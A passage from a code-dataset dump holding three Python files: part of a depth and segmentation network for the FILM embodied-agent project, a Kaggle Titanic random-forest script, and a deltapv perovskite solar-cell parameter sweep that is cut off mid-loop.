mle_depth = self.depth_pred.argmax(dim=1, keepdim=True).float() * (self.max_depth / self.num_bins)\r\n return mle_depth\r\n\r\n def expectation(self):\r\n expected_depth = (self.domain() * self.depth_pred).sum(dim=1, keepdims=True) * (self.max_depth / self.num_bins)\r\n return expected_depth\r\n\r\n def spread(self):\r\n spread = (self.mle() - self.expectation()).abs()\r\n return spread\r\n\r\n def percentile(self, which):\r\n domain = self.domain()\r\n cumsum = self.depth_pred.cumsum(dim=1)\r\n pctlbin = ((cumsum < which) * domain).max(dim=1, keepdim=True).values\r\n pctldepth = pctlbin * (self.max_depth / self.num_bins)\r\n return pctldepth\r\n\r\n def get_trustworthy_depth(self, include_mask=None, confidence=0.9, max_conf_int_width_prop=0.30, include_mask_prop=1.0):\r\n conf_int_lower = self.percentile((1 - confidence) / 2)\r\n conf_int_upper = self.percentile(1 - (1 - confidence) / 2)\r\n\r\n spread = conf_int_upper - conf_int_lower\r\n max_conf_int_width = self.expectation() * max_conf_int_width_prop\r\n trusted_mask = spread < max_conf_int_width\r\n\r\n accept_mask = trusted_mask * (1-include_mask.bool().float()).bool()\r\n\r\n if include_mask is not None:\r\n # Apply looser criteria for objects that the agent is actively looking for\r\n include_mask_criteria = spread < include_mask_prop * self.expectation()\r\n include_mask_solid = include_mask_criteria * include_mask\r\n accept_mask = accept_mask.bool() + include_mask_solid.bool()\r\n\r\n est_depth = self.mle()\r\n trustworthy_depth = est_depth * accept_mask\r\n return trustworthy_depth\r\n\r\n\r\nclass DoubleConv(torch.nn.Module):\r\n def __init__(self, cin, cout, k, stride=1, padding=0, cmid=None, stride2=1):\r\n super(DoubleConv, self).__init__()\r\n if cmid is None:\r\n cmid = cin\r\n self.conv1 = nn.Conv2d(cin, cmid, k, stride=stride, padding=padding)\r\n self.conv2 = nn.Conv2d(cmid, cout, k, stride=stride2, padding=padding)\r\n\r\n def init_weights(self):\r\n torch.nn.init.kaiming_uniform(self.conv1.weight)\r\n self.conv1.bias.data.fill_(0)\r\n torch.nn.init.kaiming_uniform(self.conv2.weight)\r\n self.conv2.bias.data.fill_(0)\r\n\r\n def forward(self, img):\r\n x = self.conv1(img)\r\n x = F.leaky_relu(x)\r\n x = self.conv2(x)\r\n return x\r\n\r\n\r\nclass UpscaleDoubleConv(torch.nn.Module):\r\n def __init__(self, cin, cout, k, stride=1, padding=0):\r\n super(UpscaleDoubleConv, self).__init__()\r\n self.conv1 = nn.Conv2d(cin, cout, k, stride=1, padding=padding)\r\n #self.upsample1 = Upsample(scale_factor=2, mode=\"nearest\")\r\n self.conv2 = nn.Conv2d(cout, cout, k, stride=1, padding=padding)\r\n\r\n def init_weights(self):\r\n torch.nn.init.kaiming_uniform(self.conv1.weight)\r\n self.conv1.bias.data.fill_(0)\r\n torch.nn.init.kaiming_uniform(self.conv2.weight)\r\n self.conv2.bias.data.fill_(0)\r\n\r\n def forward(self, img, output_size):\r\n x = self.conv1(img)\r\n x = F.leaky_relu(x)\r\n x = F.interpolate(x, scale_factor=2, mode=\"nearest\")\r\n x = self.conv2(x)\r\n if x.shape[2] > output_size[2]:\r\n x = x[:, :, :output_size[2], :]\r\n if x.shape[3] > output_size[3]:\r\n x = x[:, :, :, :output_size[3]]\r\n return x\r\n\r\n\r\nclass SimpleUNEt(torch.nn.Module):\r\n def __init__(self, distr_depth, vec_head, segonly):\r\n super(SimpleUNEt, self).__init__()\r\n\r\n self.num_c = segdef.get_num_objects()\r\n self.depth_bins = 50\r\n\r\n class objectview(object):\r\n def __init__(self, d):\r\n self.__dict__ = d\r\n params = {\r\n \"in_channels\": 3,\r\n \"hc1\": 256 if distr_depth else 256,\r\n \"hc2\": 256 if distr_depth else 256,\r\n \"out_channels\": self.num_c + DEPTH_BINS if distr_depth else self.num_c + 1,\r\n \"out_vec_length\": self.num_c + 1,\r\n \"stride\": 2\r\n }\r\n\r\n self.p = objectview(params)\r\n self.distr_depth = distr_depth\r\n self.vec_head = vec_head\r\n\r\n DeconvOp = UpscaleDoubleConv\r\n ConvOp = DoubleConv\r\n\r\n # inchannels, outchannels, kernel size\r\n self.conv1 = ConvOp(self.p.in_channels, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv2 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv3 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv4 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv5 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.conv6 = ConvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n\r\n self.deconv1 = DeconvOp(self.p.hc1, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv2 = DeconvOp(self.p.hc1 * 2, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv3 = DeconvOp(self.p.hc1 * 2, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv4 = DeconvOp(self.p.hc1 * 2, self.p.hc1, 3, stride=self.p.stride, padding=1)\r\n self.deconv5 = DeconvOp(self.p.hc1 * 2, self.p.hc2, 3, stride=self.p.stride, padding=1)\r\n self.deconv6 = DeconvOp(self.p.hc1 + self.p.hc2, self.p.out_channels, 3, stride=self.p.stride, padding=1)\r\n\r\n if self.vec_head:\r\n self.linear1 = nn.Linear(self.p.hc1, self.p.hc1)\r\n self.linear2 = nn.Linear(self.p.hc1, self.p.out_vec_length)\r\n\r\n self.act = nn.LeakyReLU()\r\n self.dropout = nn.Dropout(0.5)\r\n self.dropout2 = nn.Dropout(0.5)\r\n self.norm2 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm3 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm4 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm5 = nn.InstanceNorm2d(self.p.hc1)\r\n self.norm6 = nn.InstanceNorm2d(self.p.hc1)\r\n # self.dnorm1 = nn.InstanceNorm2d(in_channels * 4)\r\n self.dnorm2 = nn.InstanceNorm2d(self.p.hc1)\r\n self.dnorm3 = nn.InstanceNorm2d(self.p.hc1)\r\n self.dnorm4 = nn.InstanceNorm2d(self.p.hc1)\r\n self.dnorm5 = nn.InstanceNorm2d(self.p.hc2)\r\n\r\n def init_weights(self):\r\n self.conv1.init_weights()\r\n self.conv2.init_weights()\r\n self.conv3.init_weights()\r\n self.conv4.init_weights()\r\n self.conv5.init_weights()\r\n self.deconv1.init_weights()\r\n self.deconv2.init_weights()\r\n self.deconv3.init_weights()\r\n self.deconv4.init_weights()\r\n #self.deconv5.init_weights()\r\n\r\n def forward(self, input):\r\n x1 = self.norm2(self.act(self.conv1(input)))\r\n x2 = self.norm3(self.act(self.conv2(x1)))\r\n x3 = self.norm4(self.act(self.conv3(x2)))\r\n\r\n x3 = self.dropout(x3)\r\n\r\n x4 = self.norm5(self.act(self.conv4(x3)))\r\n x5 = self.norm6(self.act(self.conv5(x4)))\r\n x6 = self.act(self.conv6(x5))\r\n\r\n x6 = self.dropout(x6)\r\n\r\n y5 = self.act(self.deconv1(x6, output_size=x5.size()))\r\n xy5 = torch.cat([x5, y5], 1)\r\n\r\n y4 = self.dnorm3(self.act(self.deconv2(xy5, output_size=x4.size())))\r\n xy4 = torch.cat([x4, y4], 1)\r\n y3 = self.dnorm4(self.act(self.deconv3(xy4, output_size=x3.size())))\r\n xy3 = torch.cat([x3, y3], 1)\r\n y2 = self.dnorm4(self.act(self.deconv4(xy3, output_size=x2.size())))\r\n xy2 = torch.cat([x2, y2], 1)\r\n\r\n xy2 = self.dropout(xy2)\r\n\r\n y1 = self.dnorm5(self.act(self.deconv5(xy2, output_size=x1.size())))\r\n xy1 = torch.cat([x1, y1], 1)\r\n out = self.deconv6(xy1, output_size=input.size())\r\n\r\n out_a = out[:, :self.num_c]\r\n out_b = out[:, self.num_c:]\r\n\r\n out_a = multidim_logsoftmax(out_a, dims=(1,))\r\n\r\n if self.distr_depth:\r\n out_b = multidim_logsoftmax(out_b, dims=(1,))\r\n\r\n if self.vec_head:\r\n vec_head = self.linear2(self.act(self.linear1(x6.mean(dim=2).mean(dim=2))))\r\n vec_head = F.log_softmax(vec_head, dim=1)\r\n else:\r\n vec_head = None\r\n\r\n return out_a, out_b, vec_head\r\n\r\n\r\nclass AlfredSegmentationAndDepthModel(nn.Module):\r\n\r\n \"\"\"\r\n Given a current state s_t, proposes an action distribution that makes sense.\r\n \"\"\"\r\n def __init__(self, hparams = None, distr_depth=DISTR_DEPTH, vec_head=VEC_HEAD, segonly=False):\r\n super().__init__()\r\n self.hidden_dim = 128\r\n self.semantic_channels = segdef.get_num_objects()\r\n self.distr_depth = distr_depth\r\n self.vec_head = vec_head\r\n\r\n self.net = SimpleUNEt(distr_depth, vec_head, segonly)\r\n\r\n self.iter = nn.Parameter(torch.zeros([1], dtype=torch.double), requires_grad=False)\r\n\r\n self.nllloss = nn.NLLLoss(reduce=True, size_average=True)\r\n self.celoss = nn.CrossEntropyLoss(reduce=True, size_average=True)\r\n self.mseloss = nn.MSELoss(reduce=True, size_average=True)\r\n self.act = nn.LeakyReLU()\r\n\r\n def predict(self, rgb_image):\r\n with torch.no_grad():\r\n if self.distr_depth:\r\n DEPTH_TEMPERATURE_BETA = 0.5# 0.5 # 1.0# 0.3\r\n SEG_TEMPERATURE_BETA = 1.0 # 1.5\r\n\r\n seg_pred, depth_pred, vec_head = self.forward_model(rgb_image)\r\n seg_pred = torch.exp(seg_pred * SEG_TEMPERATURE_BETA)\r\n depth_pred = torch.exp(depth_pred * DEPTH_TEMPERATURE_BETA)\r\n depth_pred = depth_pred / (depth_pred.sum(dim=1, keepdim=True))\r\n\r\n depth_pred = DepthEstimate(depth_pred, DEPTH_BINS, DEPTH_MAX)\r\n\r\n # Filter segmentations\r\n good_seg_mask = seg_pred > 0.3\r\n seg_pred = seg_pred * good_seg_mask\r\n seg_pred = seg_pred / (seg_pred.sum(dim=1, keepdims=True) + 1e-10)\r\n else:\r\n seg_pred, depth_pred, vec_head = self.forward_model(rgb_image)\r\n seg_pred = torch.exp(seg_pred)\r\n\r\n good_seg_mask = seg_pred > 0.3\r\n good_depth_mask = (seg_pred > 0.5).sum(dim=1, keepdims=True) * (depth_pred > 0.9)\r\n seg_pred = seg_pred * good_seg_mask\r\n seg_pred = seg_pred / (seg_pred.sum(dim=1, keepdims=True) + 1e-10)\r\n depth_pred = depth_pred * good_depth_mask\r\n\r\n return seg_pred, depth_pred\r\n\r\n def forward_model(self, rgb_image: torch.tensor):\r\n return self.net(rgb_image)\r\n\r\n def get_name(self) -> str:\r\n return \"alfred_segmentation_and_depth_model\"\r\n\r\n def loss(self, batch: Dict):\r\n # This is now forward\r\n return self.forward(batch)\r\n\r\n def forward(self, batch: Dict):\r\n observations = batch[\"observations\"]\r\n\r\n rgb_image = observations.rgb_image.float()\r\n seg_gt = observations.semantic_image.float().clone()\r\n depth_gt = observations.depth_image.float()\r\n inv_gt = observations.inventory_vector.float()\r\n inv_gt_int = (inv_gt.argmax(dim=1) + 1) * (inv_gt.max(1).values > 0.5)\r\n\r\n # Switch to a one-hot segmentation representation\r\n observations.uncompress()\r\n seg_gt_oh = observations.semantic_image.float()\r\n\r\n b, c, h, w = seg_gt.shape\r\n\r\n seg_pred, depth_pred, vec_head = self.forward_model(rgb_image)\r\n\r\n c = seg_pred.shape[1]\r\n\r\n seg_flat_pred = seg_pred.permute((0, 2, 3, 1)).reshape([b * h * w, c])\r\n seg_flat_gt = seg_gt.permute((0, 2, 3, 1)).reshape([b * h * w]).long()\r\n\r\n seg_loss = self.nllloss(seg_flat_pred, seg_flat_gt)\r\n\r\n if VEC_HEAD:\r\n inv_loss = self.nllloss(vec_head, inv_gt_int)\r\n\r\n if self.distr_depth:\r\n depth_flat_pred = depth_pred.permute((0, 2, 3, 1)).reshape([b * h * w, DEPTH_BINS])\r\n depth_flat_gt = depth_gt.permute((0, 2, 3, 1)).reshape([b * h * w])\r\n depth_flat_gt = ((depth_flat_gt / DEPTH_MAX).clamp(0, 0.999) * DEPTH_BINS).long()\r\n depth_loss = self.nllloss(depth_flat_pred, depth_flat_gt)\r\n\r\n depth_pred_mean = (torch.arange(0, DEPTH_BINS, 1, device=depth_pred.device)[None, :, None, None] * torch.exp(depth_pred)).sum(dim=1)\r\n depth_mae = (depth_pred_mean.view([-1]) - depth_flat_gt).abs().float().mean() * (DEPTH_MAX / DEPTH_BINS)\r\n\r\n else:\r\n depth_flat_pred = depth_pred.reshape([b, h * w])\r\n depth_flat_gt = depth_gt.reshape([b, h * w])\r\n depth_loss = self.mseloss(depth_flat_pred, depth_flat_gt)\r\n depth_mae = (depth_flat_pred - depth_flat_gt).abs().mean()\r\n\r\n seg_pred_distr = torch.exp(seg_pred)\r\n\r\n if TRAIN_DEPTH_ONLY:\r\n loss = depth_loss\r\n elif TRAIN_SEG_ONLY:\r\n loss = seg_loss\r\n else:\r\n loss = seg_loss + depth_loss\r\n\r\n if VEC_HEAD:\r\n loss = loss + inv_loss\r\n\r\n metrics = {}\r\n metrics[\"loss\"] = loss.item()\r\n metrics[\"seg_loss\"] = seg_loss.item()\r\n metrics[\"depth_loss\"] = depth_loss.item()\r\n metrics[\"depth_mae\"] = depth_mae.item()\r\n if VEC_HEAD:\r\n metrics[\"inv_loss\"] = inv_loss.item()\r\n\r\n self.iter += 1\r\n\r\n return loss, metrics\r\n","repo_name":"soyeonm/FILM","sub_path":"models/depth/alfred_perception_models.py","file_name":"alfred_perception_models.py","file_ext":"py","file_size_in_byte":15736,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"3154193101","text":"import pandas as pd\nimport numpy as np \nfrom sklearn.ensemble import RandomForestClassifier\n\ndef filterData(df):\n\tdf['Gender'] = df['Sex'].map({'female':0,'male':1})\n\tdf['AgeFill'] = df['Age']\n\n\tmedian_ages = np.zeros((2,3))\n\tfor i in range(0,2):\n\t\tfor j in range(0,3):\n\t\t\tmedian_ages[i,j] = df.loc[(df['Gender'] == i) & (df['Pclass'] == j+1),'Age'].median()\n\n\n\tfor i in range(0,2):\n\t\tfor j in range(0,3):\n\t\t\tdf.loc[(df.Age.isnull()) & (df['Gender'] == i) & (df['Pclass'] == j+1),'AgeFill'] = median_ages[i,j]\n\n\n\tdf = df.drop(['Name','Sex','Age','Ticket','Cabin','Embarked'],axis=1)\n\tdf.loc[df.Fare.isnull(),'Fare'] = df['Fare'].median()\n\tdf['Age*Class'] = df.AgeFill * df.Pclass\n\tdf['FamilySize'] = df.SibSp + df.Parch\n\treturn df\n\ndf = pd.read_csv('train.csv',header=0)\ndf = filterData(df)\ntrain_data = df.values\n\nforest = RandomForestClassifier(n_estimators = 100)\nforest = forest.fit(train_data[0::,2::],train_data[0::,1])\n\ntest_df = pd.read_csv('test.csv',header=0)\ntest_df = filterData(test_df)\ntest_data = test_df.values\n\noutput = forest.predict(test_data[0::,1::])\n\nresult = open('multimodel.csv','wb')\nresult.write('PassengerId,Survived\\n')\n\nfor row0,row1 in zip(test_data[0::,0],output):\n\tresult.write('{0},{1}\\n'.format(int(row0),int(row1)))\n\nresult.close()\n\n","repo_name":"THTBSE/MachineLearning","sub_path":"kaggle/titanic/multivaribleModel.py","file_name":"multivaribleModel.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"8342224004","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 9 09:56:36 2021\r\n\r\n@author: Abdul\r\n\"\"\"\r\n\r\nimport deltapv as dpv\r\nfrom jax import numpy as jnp, grad\r\nimport os,sys\r\nimport subprocess as SC\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as pl\r\n\r\n\r\nfrontworkfunction = 4.0964\r\nbackworkfunction = 5.1738 \r\n\r\n\r\n\r\nChi_HTM= 2.0355\r\nEg_HTM= 3.3645\r\neps_HTM= 16.161\r\nNc_HTM=1e20\r\nNv_HTM=1e18\r\nmn_HTM=4.9727\r\nmp_HTM=436.13\r\ntn_HTM=1e-3\r\ntp_HTM=1e-3\r\nA_HTM=2e4\r\nthickness_HTM = 0.0004989\r\nnumacceptor = 1e9\r\n\r\nChi_ETM= 4.0303\r\nEg_ETM= 3.9375\r\neps_ETM= 7.3402\r\nNc_ETM=1e18\r\nNv_ETM=1e18\r\nmn_ETM=175.49\r\nmp_ETM= 5.4444\r\ntn_ETM=1e-3\r\ntp_ETM=1e-3\r\nA_ETM=2e4\r\nthickness_ETM = 0.0001707\r\nnum_donor = 1e9\r\n\r\nChi_absorber=3.9,\r\nEg_Absorber=1.5,\r\neps_absorber=10,\r\nNc_absorber=3.9e18,\r\nNv_absorber=2.7e18,\r\nmn_absorber=2,\r\nmp_absorber=2,\r\ntn_absorber=1e-3,\r\ntp_absorber=1e-3,\r\nA_absorber=2e4,\r\nthickness_absorber= 0.0007321\r\n\r\n\r\n######\r\n######\r\n######\r\n######\r\n######\r\n##### low :\r\n\r\n \r\n\r\nlow_frontworkfunction = 4\r\nlow_backworkfunction = 4.5 \r\n\r\n\r\n\r\nlow_Chi_HTM= 2.0\r\nlow_Eg_HTM= 1.3\r\nlow_eps_HTM= 2\r\nlow_Nc_HTM=2.2e19\r\nlow_Nv_HTM=3.9e19\r\nlow_mn_HTM=1e-2\r\nlow_mp_HTM=1e-2\r\nlow_tn_HTM=1e-5\r\nlow_tp_HTM=1e-5\r\nlow_A_HTM=2e4\r\nlow_thickness_HTM = 0.000005\r\nlow_numacceptor = 1e13\r\n\r\nlow_Chi_ETM= 3.8\r\nlow_Eg_ETM= 1.55\r\nlow_eps_ETM= 2\r\nlow_Nc_ETM=2e19\r\nlow_Nv_ETM=6e19\r\nlow_mn_ETM=1e-2\r\nlow_mp_ETM= 1e-2\r\nlow_tn_ETM=1e-5\r\nlow_tp_ETM=1e-5\r\nlow_A_ETM=2e4\r\nlow_thickness_ETM = 0.000001\r\nlow_num_donor = 1e13\r\n\r\nlow_Chi_absorber=3.5\r\nlow_Eg_Absorber=0.6\r\nlow_eps_absorber=2\r\nlow_Nc_absorber=2.2e19\r\nlow_Nv_absorber=3.9e19\r\nlow_mn_absorber=1e-2\r\nlow_mp_absorber=1e-2\r\nlow_tn_absorber=1e-5\r\nlow_tp_absorber=1e-5\r\nlow_A_absorber=2e4\r\nlow_thickness_absorber= 0.00003\r\n\r\n\r\n\r\n##### high:\r\n\r\n \r\n\r\n\r\nhigh_frontworkfunction = 5\r\nhigh_backworkfunction = 5.5 \r\n\r\n\r\n\r\nhigh_Chi_HTM= 4.2\r\nhigh_Eg_HTM= 2.55\r\nhigh_eps_HTM= 18\r\nhigh_Nc_HTM=2.5e21\r\nhigh_Nv_HTM=2.5e21\r\nhigh_mn_HTM=1e2\r\nhigh_mp_HTM=1e2\r\nhigh_tn_HTM=1e-3\r\nhigh_tp_HTM=1e-3\r\nhigh_A_HTM=2.1e4\r\nhigh_thickness_HTM = 0.00005\r\nhigh_numacceptor = 1e17\r\n\r\nhigh_Chi_ETM= 4.8\r\nhigh_Eg_ETM= 4\r\nhigh_eps_ETM= 18\r\nhigh_Nc_ETM=1e21\r\nhigh_Nv_ETM=1.8e21\r\nhigh_mn_ETM=1e2\r\nhigh_mp_ETM= 1e2\r\nhigh_tn_ETM=1e-3\r\nhigh_tp_ETM=1e-3\r\nhigh_A_ETM=2.1e4\r\nhigh_thickness_ETM = 0.00005\r\nhigh_num_donor = 2e17\r\n\r\nhigh_Chi_absorber= 4.5\r\nhigh_Eg_Absorber= 1.5\r\nhigh_eps_absorber=18\r\nhigh_Nc_absorber=2.5e21\r\nhigh_Nv_absorber=2.5e21\r\nhigh_mn_absorber=1e2\r\nhigh_mp_absorber=1e2\r\nhigh_tn_absorber=1e-3\r\nhigh_tp_absorber=1e-3\r\nhigh_A_absorber=2.1e4\r\nhigh_thickness_absorber= 0.001\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nfront = [frontworkfunction]\r\nback = [backworkfunction]\r\n\r\n\r\n\r\nHTM = [Chi_HTM,\r\n Eg_HTM,\r\n eps_HTM,\r\n Nc_HTM,\r\n Nv_HTM,\r\n mn_HTM,\r\n mp_HTM,\r\n tn_HTM,\r\n tp_HTM,\r\n A_HTM,\r\n thickness_HTM,\r\n numacceptor]\r\n\r\nETM = [Chi_ETM,\r\n Eg_ETM,\r\n eps_ETM,\r\n Nc_ETM,\r\n Nv_ETM,\r\n mn_ETM,\r\n mp_ETM,\r\n tn_ETM,\r\n tp_ETM,\r\n A_ETM,\r\n thickness_ETM,\r\n num_donor]\r\n\r\nabsorber = [Chi_absorber,\r\n Eg_Absorber,\r\n eps_absorber,\r\n Nc_absorber,\r\n Nv_absorber,\r\n mn_absorber,\r\n mp_absorber,\r\n tn_absorber,\r\n tp_absorber,\r\n A_absorber,\r\n thickness_absorber]\r\n\r\n\r\n\r\n\r\nc = 0\r\nfor i in HTM:\r\n HTM[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in ETM:\r\n ETM[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in absorber:\r\n absorber[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in front:\r\n front[c]=[]\r\n c=c+1\r\n\r\n\r\nc = 0\r\nfor i in back:\r\n back[c]=[]\r\n c=c+1\r\n\r\n\r\nfor i in range(0,1000000):\r\n \r\n front[0].extend([random.uniform(low_frontworkfunction,high_frontworkfunction)])\r\n back[0].extend([random.uniform(low_backworkfunction,high_backworkfunction)])\r\n\r\n \r\n \r\n HTM[0].extend([random.uniform(low_Chi_HTM,high_Chi_HTM)])\r\n HTM[1].extend([random.uniform(low_Eg_HTM,high_Eg_HTM)])\r\n HTM[2].extend([random.uniform(low_eps_HTM,high_eps_HTM)])\r\n HTM[3].extend([random.uniform(low_Nc_HTM,high_Nc_HTM)])\r\n HTM[4].extend([random.uniform(low_Nv_HTM,high_Nv_HTM)])\r\n HTM[5].extend([random.uniform(low_mn_HTM,high_mn_HTM)])\r\n HTM[6].extend([random.uniform(low_mp_HTM,high_mp_HTM)])\r\n HTM[7].extend([random.uniform(low_tn_HTM,high_tn_HTM)])\r\n HTM[8].extend([random.uniform(low_tp_HTM,high_tp_HTM)])\r\n HTM[9].extend([random.uniform(low_A_HTM,high_A_HTM)])\r\n HTM[10].extend([random.uniform(low_thickness_HTM,high_thickness_HTM)])\r\n HTM[11].extend([random.uniform(low_numacceptor,high_numacceptor)])\r\n\r\n\r\n ETM[0].extend([random.uniform(low_Chi_ETM,high_Chi_ETM)])\r\n ETM[1].extend([random.uniform(low_Eg_ETM,high_Eg_ETM)])\r\n ETM[2].extend([random.uniform(low_eps_ETM,high_eps_ETM)])\r\n ETM[3].extend([random.uniform(low_Nc_ETM,high_Nc_ETM)])\r\n ETM[4].extend([random.uniform(low_Nv_ETM,high_Nv_ETM)])\r\n ETM[5].extend([random.uniform(low_mn_ETM,high_mn_ETM)])\r\n ETM[6].extend([random.uniform(low_mp_ETM,high_mp_ETM)])\r\n ETM[7].extend([random.uniform(low_tn_ETM,high_tn_ETM)])\r\n ETM[8].extend([random.uniform(low_tp_ETM,high_tp_ETM)])\r\n ETM[9].extend([random.uniform(low_A_ETM,high_A_ETM)])\r\n ETM[10].extend([random.uniform(low_thickness_ETM,high_thickness_ETM)])\r\n ETM[11].extend([random.uniform(low_num_donor,high_num_donor)])\r\n \r\n absorber[0].extend([random.uniform(low_Chi_absorber,high_Chi_absorber)])\r\n absorber[1].extend([random.uniform(low_Eg_Absorber,high_Eg_Absorber)])\r\n absorber[2].extend([random.uniform(low_eps_absorber,high_eps_absorber)])\r\n absorber[3].extend([random.uniform(low_Nc_absorber,high_Nc_absorber)])\r\n absorber[4].extend([random.uniform(low_Nv_absorber,high_Nv_absorber)])\r\n absorber[5].extend([random.uniform(low_mn_absorber,high_mn_absorber)])\r\n absorber[6].extend([random.uniform(low_mp_absorber,high_mp_absorber)])\r\n absorber[7].extend([random.uniform(low_tn_absorber,high_tn_absorber)])\r\n absorber[8].extend([random.uniform(low_tp_absorber,high_tp_absorber)])\r\n absorber[9].extend([random.uniform(low_A_absorber,high_A_absorber)])\r\n absorber[10].extend([random.uniform(low_thickness_absorber,high_thickness_absorber)])\r\n \r\n # absorber[0].extend([random.uniform(low_thickness_absorber,high_thickness_absorber)])\r\n\r\n\r\n\r\n\r\n\r\n# print(HTM)\r\n# print(ETM)\r\n# print(absorber)\r\n\r\n\r\nChi_HTM_=[]\r\nEg_HTM_=[]\r\neps_HTM_=[]\r\nNc_HTM_=[]\r\nNv_HTM_=[]\r\nmn_HTM_=[]\r\nmp_HTM_=[]\r\ntn_HTM_=[]\r\ntp_HTM_=[]\r\nA_HTM_=[]\r\nthickness_HTM_ = []\r\nnumacceptor_ = []\r\n\r\n\r\n\r\nChi_ETM_=[]\r\nEg_ETM_=[]\r\neps_ETM_=[]\r\nNc_ETM_=[]\r\nNv_ETM_=[]\r\nmn_ETM_=[]\r\nmp_ETM_=[]\r\ntn_ETM_=[]\r\ntp_ETM_=[]\r\nA_ETM_=[]\r\nthickness_ETM_ = []\r\nnum_donor_ = []\r\n\r\n\r\nChi_absorber_=[]\r\nEg_Absorber_=[]\r\neps_absorber_=[]\r\nNc_absorber_=[]\r\nNv_absorber_=[]\r\nmn_absorber_=[]\r\nmp_absorber_=[]\r\ntn_absorber_=[]\r\ntp_absorber_=[]\r\nA_absorber_=[]\r\nthickness_absorber_=[]\r\n\r\ncurrent_ = []\r\nvoltage_ = []\r\neffeciency_ =[] \r\nr=0\r\nc=0\r\nfor i in range(0,1000000):\r\n \r\n frontworkfunction = float(front[0][c])\r\n backworkfunction = float(back[0][c]) \r\n \r\n Chi_HTM=float(HTM[0][c])\r\n Eg_HTM=float(HTM[1][c])\r\n eps_HTM=float(HTM[2][c])\r\n Nc_HTM=float(HTM[3][c])\r\n Nv_HTM=float(HTM[4][c])\r\n mn_HTM=float(HTM[5][c])\r\n mp_HTM=float(HTM[6][c])\r\n tn_HTM=float(HTM[7][c])\r\n tp_HTM=float(HTM[8][c])\r\n A_HTM=float(HTM[9][c])\r\n thickness_HTM = float(HTM[10][c])\r\n numacceptor = float(HTM[11][c])\r\n\r\n \r\n \r\n Chi_ETM=float(ETM[0][c])\r\n Eg_ETM=float(ETM[1][c])\r\n eps_ETM=float(ETM[2][c])\r\n Nc_ETM=float(ETM[3][c])\r\n Nv_ETM=float(ETM[4][c])\r\n mn_ETM=float(ETM[5][c])\r\n mp_ETM=float(ETM[6][c])\r\n tn_ETM=float(ETM[7][c])\r\n tp_ETM=float(ETM[8][c])\r\n A_ETM=float(ETM[9][c])\r\n thickness_ETM = float(ETM[10][c])\r\n num_donor = float(ETM[11][c])\r\n\r\n\r\n\r\n Chi_absorber= float(absorber[0][c])\r\n Eg_Absorber=float(absorber[1][c])\r\n eps_absorber=float(absorber[2][c])\r\n Nc_absorber=float(absorber[3][c])\r\n Nv_absorber=float(absorber[4][c])\r\n mn_absorber=float(absorber[5][c])\r\n mp_absorber=float(absorber[6][c])\r\n tn_absorber=float(absorber[7][c])\r\n tp_absorber=float(absorber[8][c])\r\n A_absorber=float(absorber[9][c])\r\n thickness_absorber= float(absorber[10][c])\r\n \r\n if (Chi_ETM - frontworkfunction) > 0:\r\n c=c+1\r\n print('1' ,Chi_ETM, frontworkfunction)\r\n continue\r\n elif (Chi_ETM - Chi_absorber) < 0:\r\n c=c+1\r\n print('2',Chi_ETM , Chi_absorber)\r\n continue\r\n elif (backworkfunction-Chi_HTM-Eg_HTM) > 0:\r\n c=c+1\r\n print('3',backworkfunction,Chi_HTM,Eg_HTM)\r\n continue\r\n elif (Chi_HTM+Eg_HTM-Chi_absorber-Eg_Absorber) > 0:\r\n c=c+1\r\n print('4',Chi_HTM,Eg_HTM,Chi_absorber,Eg_Absorber)\r\n continue\r\n elif (Chi_absorber-Chi_ETM)>0:\r\n c=c+1\r\n print('5',Chi_absorber,Chi_ETM)\r\n continue\r\n else: \r\n \r\n material_HTM = dpv.create_material(Chi=Chi_HTM,\r\n Eg=Eg_HTM,\r\n eps=eps_HTM,\r\n Nc=Nc_HTM,\r\n Nv=Nv_HTM,\r\n # Ndop= 1,\r\n mn=mn_HTM,\r\n mp=mp_HTM,\r\n tn=tn_HTM,\r\n tp=tp_HTM,\r\n A=A_HTM) \r\n \r\n \r\n material_absorber = dpv.create_material(Chi=Chi_absorber,\r\n Eg=Eg_Absorber,\r\n eps=eps_absorber,\r\n Nc=Nc_absorber,\r\n Nv=Nv_absorber,\r\n # Ndop= 1,\r\n mn=mn_absorber,\r\n mp=mp_absorber,\r\n tn=tn_absorber,\r\n tp=tp_absorber,\r\n A=A_absorber) \r\n \r\n material_ETM = dpv.create_material(Chi=Chi_ETM,\r\n Eg=Eg_ETM,\r\n eps=eps_ETM,\r\n Nc=Nc_ETM,\r\n Nv=Nv_ETM,\r\n mn=mn_ETM,\r\n mp=mp_ETM,\r\n tn=tn_ETM,\r\n tp=tp_ETM,\r\n A=A_ETM) \r\n \r\n \r\n des = dpv.make_design(n_points=500,\r\n Ls=[thickness_ETM, thickness_absorber, thickness_HTM],\r\n mats=[material_ETM, material_absorber, material_HTM],\r\n Ns=[num_donor, 0, -numacceptor],\r\n Snl=1.16e7, Snr=1.16e7, Spl=1.16e7, Spr=1.16e7,\r\n PhiM0 = frontworkfunction ,\r\n PhiML = backworkfunction)\r\n \r\n \r\n ls = dpv.incident_light() \r\n try:\r\n \r\n results 